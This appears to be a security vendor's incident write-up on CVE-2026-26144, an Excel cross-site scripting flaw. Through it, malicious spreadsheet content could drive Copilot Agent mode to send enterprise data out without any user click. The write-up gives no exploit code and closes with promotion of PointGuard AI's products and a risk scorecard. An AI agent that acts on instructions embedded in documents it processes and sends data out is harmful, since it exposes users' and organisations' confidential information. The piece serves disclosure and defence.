Spreadsheet Spycraft: Excel Copilot Zero-Click Data Leak Risk (CVE-2026-26144)
Key Takeaways
- Critical Excel vulnerability could enable zero-click data exfiltration through Copilot Agent mode.
- Attack relies on a cross-site scripting flaw that triggers unintended network requests.
- Exploitation does not require user interaction once malicious content is processed.
- Demonstrates growing security risks when AI agents interact with traditional software features.
Zero-Click Copilot Exploit Highlights New AI Application Risk
A critical vulnerability in Microsoft Excel could allow attackers to trigger Copilot Agent mode to exfiltrate sensitive data without user interaction. The issue, disclosed during Microsoft’s March 2026 Patch Tuesday, combines a traditional cross-site scripting flaw with AI agent behavior. Security researchers warn that this type of attack demonstrates how AI copilots can unintentionally become channels for automated data leakage if malicious inputs manipulate their capabilities. (The Register)
What We Know
Microsoft disclosed the vulnerability, tracked as CVE-2026-26144, as part of its March 2026 Patch Tuesday security update. The flaw affects Microsoft Excel and involves improper input neutralization during web page generation that results in a cross-site scripting vulnerability. (Redmondmag)
Researchers highlighted that this vulnerability could interact with Copilot Agent mode, enabling an attacker to cause the AI assistant to transmit sensitive data over unintended network connections. The attack scenario requires network access but does not require user interaction, making it a zero-click information disclosure attack.
The vulnerability was disclosed publicly alongside dozens of other security issues addressed in Microsoft’s March update cycle. Microsoft reported that nearly eighty vulnerabilities were patched in the release, spanning multiple products including Windows, Office, and cloud services. (Cyber Security News)
At the time of disclosure, there was no confirmed evidence of active exploitation in the wild. However, security experts noted that the attack technique demonstrates a new category of vulnerabilities where AI agents can amplify the impact of traditional application bugs by automatically performing actions such as retrieving or transmitting data.
What Could Happen
The vulnerability stems from improper input handling in Excel that allows attackers to embed malicious content capable of executing in contexts used by Copilot or web-based rendering. This cross-site scripting condition could be leveraged to cause the AI agent to make outbound requests containing sensitive information.
In practice, a malicious spreadsheet or embedded content could instruct the Copilot agent to retrieve or process data that resides in the user’s environment. Because Copilot operates with access to the user’s documents and enterprise context, this information could include internal documents, spreadsheets, or other business data accessible through Microsoft 365.
The defining feature of the attack is its zero-click nature. Once the malicious content is processed, the exploit can trigger automatically without requiring the user to click a link, approve an action, or open additional files.
The AI component significantly changes the risk profile. Traditional cross-site scripting flaws often require user interaction to trigger malicious actions. In this case, an AI agent that interprets content and initiates tasks may automatically execute the attacker’s intended workflow, effectively turning a passive vulnerability into an automated data exfiltration channel.
Why It Matters
This vulnerability highlights how AI copilots can unintentionally expand the blast radius of traditional software vulnerabilities. Tools like Copilot operate across multiple data sources and workflows, including enterprise files, collaboration platforms, and cloud services. When those agents interact with compromised content, they may automatically access and transmit sensitive information.
Even if exploitation is not confirmed, the risk is significant because many organizations rely on Microsoft Excel and Microsoft 365 as core productivity platforms. The potential exposure could include confidential financial data, intellectual property, internal reports, or other enterprise documents stored within the organization’s Microsoft environment.
More broadly, the incident illustrates a growing category of AI-enabled attack paths, where attackers manipulate AI agents indirectly through malicious content. Instead of targeting users directly, adversaries can target the systems and data sources the AI assistant can access.
As AI assistants become embedded in enterprise workflows, organizations will need to reassess trust boundaries between user inputs, application logic, and automated AI behaviors.
PointGuard AI Perspective
The Excel Copilot vulnerability highlights a broader security challenge emerging across enterprise AI deployments. AI assistants and copilots operate across multiple data sources, APIs, and enterprise systems, often with broad access to sensitive information. When traditional application vulnerabilities interact with these agents, they can create automated pathways for data exposure.
PointGuard AI helps organizations identify and mitigate these risks by providing continuous visibility and security governance across AI applications and agents. Through automated AI asset discovery and AI SBOM analysis, PointGuard AI enables security teams to understand where AI assistants interact with enterprise data, third-party tools, and external services.
PointGuard AI also enforces AI policy controls and behavioral monitoring that detect unusual agent activity, including unexpected outbound requests, suspicious data access patterns, or unauthorized integrations. This capability allows organizations to identify potential exfiltration attempts or prompt manipulation before sensitive data leaves the environment.
Additionally, PointGuard AI helps security teams evaluate how AI agents interact with documents, APIs, and enterprise workflows. By mapping these dependencies and enforcing governance policies, organizations can reduce the likelihood that malicious content or application vulnerabilities trigger unintended AI behaviors.
As AI copilots become integral to enterprise productivity tools, organizations need security controls designed specifically for AI-driven workflows. PointGuard AI provides the visibility and protection needed to enable secure and trustworthy AI adoption across modern development and productivity environments.
Incident Scorecard Details
Total AISSI Score: 6.6 / 10
Criticality = 7, Vulnerability affects widely deployed enterprise productivity software and could expose sensitive enterprise data. AISSI weighting: 25%
Propagation = 6, Risk could propagate through enterprise document sharing and AI-integrated workflows within Microsoft 365 environments. AISSI weighting: 20%
Exploitability = 4, Publicly disclosed vulnerability with documented attack scenario but no confirmed exploitation reported. AISSI weighting: 15%
Supply Chain = 7, Relies on vendor-managed AI copilots and integrated cloud productivity platforms with limited organizational control. AISSI weighting: 15%
Business Impact = 7, High potential exposure of enterprise documents and sensitive business information if exploited. AISSI weighting: 25%
Sources
- Microsoft Excel Copilot zero-click vulnerability report
- Microsoft March Patch Tuesday vulnerability coverage
- Technical analysis of the Excel information disclosure flaw
PointGuard AI Sources
